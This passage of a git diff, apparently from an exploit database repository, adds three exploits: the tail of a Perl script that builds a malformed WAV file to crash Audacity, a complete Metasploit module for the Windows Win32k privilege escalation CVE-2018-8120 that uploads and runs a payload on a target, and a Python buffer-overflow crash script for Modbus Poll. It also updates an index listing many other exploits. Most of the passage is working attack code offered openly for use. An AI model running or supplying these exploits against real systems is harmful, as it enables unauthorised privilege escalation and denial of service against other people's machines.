the name "lock.wav". Open Audatcity.exe +# Go to File > Open > Import > Select "lock.wav file" +# you will see a locking on software. + +# ! /usr/bin/perl + +# Dump of assembler code for function data: +# 0x0000000000004040 <+0>: push %rdx +# 0x0000000000004041 <+1>: rex.WB +# 0x0000000000004042 <+2>: rex.RX +# 0x0000000000004043 <+3>: rex.RX retq $0x158 +# 0x0000000000004047 <+7>: add %dl,0x41(%rdi) +# 0x000000000000404a <+10>: push %rsi +# 0x000000000000404b <+11>: rex.RB +# 0x000000000000404c <+12>: rex.R +# 0x000000000000404d <+13>: rex.R +# 0x000000000000404e <+14>: rex.R +# 0x000000000000404f <+15>: rex.R clc +# 0x0000000000004051 <+17>: (bad) +# 0x0000000000004052 <+18>: (bad) +# 0x0000000000004053 <+19>: incl (%rcx) +# 0x0000000000004055 <+21>: add %al,(%rcx) +# 0x0000000000004057 <+23>: add %ah,(%rdx) +# 0x0000000000004059 <+25>: push %rsi +# 0x000000000000405a <+26>: add %al,(%rax) +# 0x000000000000405c <+28>: rex.R lods %ds:(%rsi),%al +# 0x000000000000405e <+30>: add %al,(%rax) +# 0x0000000000004060 <+32>: add (%rax),%al +# 0x0000000000004062 <+34>: adc %al,(%rax) +# 0x0000000000004064 <+36>: add %al,(%rax) +# 0x0000000000004066 <+38>: data16 (bad) +# 0x0000000000004068 <+40>: movslq 0x0(%rsp,%rax,1),%esi +# 0x000000000000406c <+44>: add %al,(%rax) +# 0x000000000000406e <+46>: rex.W lods %ds:(%rsi),%al +# 0x0000000000004070 <+48>: add %al,(%rax) +# 0x0000000000004072 <+50>: fs (bad) +# 0x0000000000004074 <+52>: je 0x40d7 +# 0x0000000000004076 <+54>: nop +# 0x0000000000004077 <+55>: pop %rax +# 0x0000000000004078 <+56>: add %eax,(%rax) +# 0x000000000000407a <+58>: add %al,(%rax) +# 0x000000000000407c <+60>: add %al,(%rax) +# 0x000000000000407e <+62>: add %al,(%rax) +# 0x0000000000004080 <+64>: add %al,(%rax) +# 0x0000000000004082 <+66>: add %al,(%rax) +# 0x0000000000004084 <+68>: add %al,(%rax) +# 0x0000000000004086 <+70>: (bad) +# 0x0000000000004087 <+71>: incl (%rax) +# 0x0000000000004089 <+73>: add %al,(%rax) +# 0x000000000000408b <+75>: add %bh,%bh +# 0x000000000000408d <+77>: incl (%rax) +# 0x000000000000408f <+79>: add %bh,%bh +# 0x0000000000004091 <+81>: incl (%rax) +# 0x0000000000004093 <+83>: add %bh,%bh +# 0x0000000000004095 <+85>: incl (%rax) +# 0x0000000000004097 <+87>: add %bh,%bh +# 0x0000000000004099 <+89>: incl (%rax) +# 0x000000000000409b <+91>: add %bh,%bh + +open(code, ">lock.wav"); +binmode(code); +$data = +"\x52\x49\x46\x46\xc2\x58\x01\x00\x57\x41\x56\x45\x44\x44\x44\x44" . +"\xf8\xff\xff\xff\x01\x00\x01\x00\x22\x56\x00\x00\x44\xac\x00\x00" . +"\x02\x00\x10\x00\x00\x00\x66\x61\x63\x74\x04\x00\x00\x00\x48\xac" . +"\x00\x00\x64\x61\x74\x61\x90\x58\x01\x00\x00\x00\x00\x00\x00\x00" . +"\x00\x00\x00\x00\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\x00\x00" . +"\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00" . +"\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00\xff\xff\x00\x00" . +"\xff\xff\x00\x00\xff\xff\x01\x00\x08\x00\x0b\x00\x0c\x00\x0b\x00" . +"\x0c\x00\x09\x00\x07\x00\x0a\x00\x0a\x00\x07\x00\x0b\x00\x09\x00" . +"\x08\x00\x0a\x00\x08\x00\x09\x00\x0a\x00\x0a\x00\x0a\x00\x09\x00" . +"\x09\x00\x0a\x00\x0c\x00\x0c\x00\x0a\x00\x0b\x00\x0c\x00\x08\x00" . +"\x0b\x00\x0d\x00\x0a\x00\x0c\x00\x0d\x00\x0a\x00\x0a\x00\x0a\x00" . +"\x0c\x00\x0c\x00\x0d\x00\x10\x00\x0b\x00\x0d\x00\x0c\x00\x09\x00" . +"\x0a\x00\x0e\x00\x0b\x00\x0b\x00\x0a\x00\x0e\x00\x0a\x00\x07\x00" . +"\x08\x00\x05\x00\x08\x00\x0b\x00\x09\x00\x0b\x00\x08\x00\x08\x00" . +"\x0b\x00\x09\x00\x07\x00\x08\x00\x07\x00\x09\x00\x0d\x00\x0c\x00" . +"\x0b\x00\x0b\x00\x0a\x00\x0c\x00\x0f\x00\x0a\x00\x0a\x00\x0b\x00" . +"\x0f\x00\x07\x00\x09\x00\x07\x00\x09\x00\x08\x00\x05\x00\x0a\x00" . +"\x0a\x00\x07\x00\x08\x00\x0b\x00\x06\x00\x0d\x00\x0c\x00\x0c\x00" . +"\x0b\x00\x0c\x00\x0b\x00\x09\x00\x0b\x00\x0b\x00\x09\x00\x0f\x00" . +"\x08\x00\x0a\x00\x0f\x00\x0b\x00\x0d\x00\x0a\x00\x0a\x00\x09\x00" . +"\x09\x00\x0d\x00\x10\x00\x0d\x00\x0b\x00\x0c\x00\x0e\x00\x09\x00" . +"\x0c\x00\x0e\x00\x0a\x00\x0b\x00\x0b\x00\x0b\x00\x0a\x00\x0e\x00"; + +print code $data; +close(code); \ No newline at end of file diff --git a/exploits/windows/local/45653.rb b/exploits/windows/local/45653.rb new file mode 100755 index 000000000..ba3eba541 --- /dev/null +++ b/exploits/windows/local/45653.rb @@ -0,0 +1,126 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GoodRanking + + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Post::Windows::Priv + include Msf::Exploit::FileDropper + + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Windows SetImeInfoEx Win32k NULL Pointer Dereference', + 'Description' => %q{ + This module exploits elevation of privilege vulnerability that exists in Windows 7 and 2008 R2 + when the Win32k component fails to properly handle objects in memory. An attacker who + successfully exploited this vulnerability could run arbitrary code in kernel mode. An + attacker could then install programs; view, change, or delete data; or create new + accounts with full user rights. + + This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'unamer', # Exploit PoC + 'bigric3', # Analysis and exploit + 'Anton Cherepanov', # Vulnerability discovery + 'Dhiraj Mishra ' # Metasploit + ], + 'Platform' => 'win', + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => { + 'EXITFUNC' => 'thread' + }, + 'Targets' => [ + [ 'Automatic', {} ], + [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ], + [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ] + ], + 'Payload' => { + 'Space' => 4096, + 'DisableNops' => true + }, + 'References' => [ + ['BID', '104034'], + ['CVE', '2018-8120'], + ['URL', 'https://github.com/unamer/CVE-2018-8120'], + ['URL', 'https://github.com/bigric3/cve-2018-8120'], + ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120'] + ], + 'DisclosureDate' => 'May 9 2018', + 'DefaultTarget' => 0 + )) + end + + def assign_target + if is_system? + fail_with(Failure::None, 'Session is already elevated') + end + + if sysinfo['OS'] =~ /XP|NT/i + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + end + + return target unless target.name == 'Automatic' + + case sysinfo['Architecture'] + when 'x64' + vprint_status('Targeting x64 system') + return targets[1] + when 'x86' + fail_with(Failure::BadConfig, "Invalid payload architecture") if payload_instance.arch.first == ARCH_X64 + vprint_status('Targeting x86 system') + return targets[2] + end + end + + def write_file_to_target(fname, data) + tempdir = session.sys.config.getenv('TEMP') + file_loc = "#{tempdir}\\#{fname}" + vprint_warning("Attempting to write #{fname} to #{tempdir}") + write_file(file_loc, data) + vprint_good("#{fname} written") + file_loc + rescue Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful") + end + + def check_arch + sys_arch = assign_target + if sys_arch.name =~ /x86/ + return 'CVE-2018-8120x86.exe' + else sys_arch.name =~ /x64/ + return 'CVE-2018-8120x64.exe' + end + end + + def exploit + cve_fname = check_arch + rexe = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8120', cve_fname) + vprint_status("Reading payload from file #{rexe}") + raw = File.read(rexe) + + rexename = "#{Rex::Text.rand_text_alphanumeric(10)}.exe" + vprint_status("EXE's name is: #{rexename}") + exe = generate_payload_exe + tempexename = "#{Rex::Text.rand_text_alpha(6..14)}.exe" + + exe_payload = write_file_to_target(tempexename, exe) + vprint_status("Payload uploaded to temp folder") + cve_exe = write_file_to_target(rexename, raw) + command = "\"#{cve_exe}\" \"#{exe_payload}\"" + vprint_status("Location of CVE-2018-8120.exe is: #{cve_exe}") + register_file_for_cleanup(exe_payload) + + vprint_status("Executing command : #{command}") + cmd_exec_get_pid(command) + print_good('Exploit finished, wait for privileged payload execution to complete.') + end +end \ No newline at end of file diff --git a/exploits/windows_x86/dos/45641.py b/exploits/windows_x86/dos/45641.py new file mode 100755 index 000000000..8ba6cba49 --- /dev/null +++ b/exploits/windows_x86/dos/45641.py @@ -0,0 +1,27 @@ +# Exploit Title: Modbus Poll 7.2.2 - Denial of Service (PoC) +# Discovery by: Cemal Cihad ÇİFTÇİ +# Discovery Date: 2018-10-19 +# Tested Version: 7.2.2 +# Vulnerability Type: DOS +# Tested on OS: Windows XP Professional Service Pack 3 +# Vendor Homepage: https://www.modbustools.com +# Download Link: https://www.modbustools.com/download.html + +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". +# Now start the program. Now when you are inside of the program click Connection button and +# click "connect". It will ask you for registration key. In the field: "Registration Key" +# paste the copied content from "exploit.txt". +# Now click "OK" and see a crash! + +#!/usr/bin/python + +buffer = "A" * 4000 +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(buffer) + f.write(buffer) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 697137621..8af0f066f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6147,6 +6147,14 @@ id,file,description,date,author,type,platform,port 45571,exploits/windows/dos/45571.js,"Microsoft Edge Chakra JIT - 'BailOutOnInvalidatedArrayHeadSegment' Check Bypass",2018-10-09,"Google Security Research",dos,windows, 45572,exploits/windows/dos/45572.js,"Microsoft Edge Chakra JIT - Type Confusion",2018-10-09,"Google Security Research",dos,windows, 45579,exploits/android/dos/45579.txt,"WhatsApp - RTP Processing Heap Corruption",2018-10-10,"Google Security Research",dos,android, +45641,exploits/windows_x86/dos/45641.py,"Modbus Poll 7.2.2 - Denial of Service (PoC)",2018-10-22,"Cemal Cihad ÇİFTÇİ",dos,windows_x86, +45644,exploits/windows/dos/45644.pl,"AudaCity 2.3 - Denial of Service (PoC)",2018-10-22,"Kağan Çapar",dos,windows, +45647,exploits/macos/dos/45647.c,"Apple Intel GPU Driver - Use-After-Free/Double-Delete due to bad Locking",2018-10-22,"Google Security Research",dos,macos, +45648,exploits/multiple/dos/45648.txt,"Apple iOS/macOS - Sandbox Escape due to Trusted Length Field in Shared Memory used by HID Event Subsystem",2018-10-22,"Google Security Research",dos,multiple, +45649,exploits/ios/dos/45649.txt,"Apple iOS - Kernel Stack Memory Disclosure due to Failure to Check copyin Return Value",2018-10-22,"Google Security Research",dos,ios, +45650,exploits/multiple/dos/45650.txt,"Apple iOS/macOS - Sandbox Escape due to mach Message sent from Shared Memory",2018-10-22,"Google Security Research",dos,multiple, +45651,exploits/multiple/dos/45651.c,"Apple iOS/macOS - Kernel Memory Corruption due to Integer Overflow in IOHIDResourceQueue::enqueueReport",2018-10-22,"Google Security Research",dos,multiple, +45652,exploits/ios/dos/45652.c,"Apple iOS Kernel - Use-After-Free due to bad Error Handling in Personas",2018-10-22,"Google Security Research",dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10037,6 +10045,7 @@ id,file,description,date,author,type,platform,port 45626,exploits/windows/local/45626.rb,"VLC Media Player - MKV Use-After-Free (Metasploit)",2018-10-16,Metasploit,local,windows, 45627,exploits/windows_x86/local/45627.py,"Any Sound Recorder 2.93 - Buffer Overflow (SEH)",2018-10-17,"Abdullah Alıç",local,windows_x86, 45631,exploits/linux/local/45631.md,"Git Submodule - Arbitrary Code Execution",2018-10-16,joernchen,local,linux, +45653,exploits/windows/local/45653.rb,"Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit)",2018-10-22,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39991,7 +40000,7 @@ id,file,description,date,author,type,platform,port 45221,exploits/php/webapps/45221.txt,"WordPress Plugin Chained Quiz 1.0.8 - 'answer' SQL Injection",2018-08-20,"Çlirim Emini",webapps,php,80 45224,exploits/php/webapps/45224.txt,"MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery",2018-08-20,0xB9,webapps,php,80 45225,exploits/php/webapps/45225.txt,"WordPress Plugin Tagregator 0.6 - Cross-Site Scripting",2018-08-20,ManhNho,webapps,php,80 -45228,exploits/php/webapps/45228.txt,"Countly - Persistent Cross-Site Scripting",2018-08-20,Sleepy,webapps,php, +45228,exploits/php/webapps/45228.txt,"Countly - Cross-Site Scripting",2018-08-20,Sleepy,webapps,php, 45230,exploits/php/webapps/45230.txt,"Twitter-Clone 1 - 'userid' SQL Injection",2018-08-21,L0RD,webapps,php,80 45231,exploits/hardware/webapps/45231.rb,"Hikvision IP Camera 5.4.0 - User Enumeration (Metasploit)",2018-08-21,Alfie,webapps,hardware, 45232,exploits/php/webapps/45232.txt,"Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)",2018-08-21,L0RD,webapps,php, @@ -40154,3 +40163,11 @@ id,file,description,date,author,type,platform,port 45635,exploits/php/webapps/45635.txt,"Learning with Texts 1.6.2 - 'start' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php, 45636,exploits/php/webapps/45636.txt,"PHP-SHOP master 1.0 - Cross-Site Request Forgery (Add Admin)",2018-10-18,"Alireza Norkazemi",webapps,php,80 45637,exploits/php/webapps/45637.txt,"OwnTicket 1.0 - 'TicketID' SQL Injection",2018-10-18,"Ihsan Sencan",webapps,php, +45639,exploits/php/webapps/45639.txt,"MySQL Edit Table 1.0 - 'id' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php, +45642,exploits/php/webapps/45642.txt,"School ERP Ultimate 2018 - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php, +45643,exploits/java/webapps/45643.txt,"Oracle Siebel CRM 8.1.1 - CSV Injection",2018-10-22,"Sarath Nair",webapps,java, +45645,exploits/php/webapps/45645.txt,"The Open ISES Project 3.30A - 'tick_lat' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php, +45646,exploits/php/webapps/45646.txt,"School ERP Ultimate 2018 - 'fid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php, +45654,exploits/php/webapps/45654.txt,"eNdonesia Portal 8.7 - 'artid' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php, +45655,exploits/php/webapps/45655.txt,"The Open ISES Project 3.30A - Arbitrary File Download",2018-10-22,"Ihsan Sencan",webapps,php, +45656,exploits/php/webapps/45656.txt,"Viva Visitor & Volunteer ID Tracking 0.95.1 - 'fname' SQL Injection",2018-10-22,"Ihsan Sencan",webapps,php,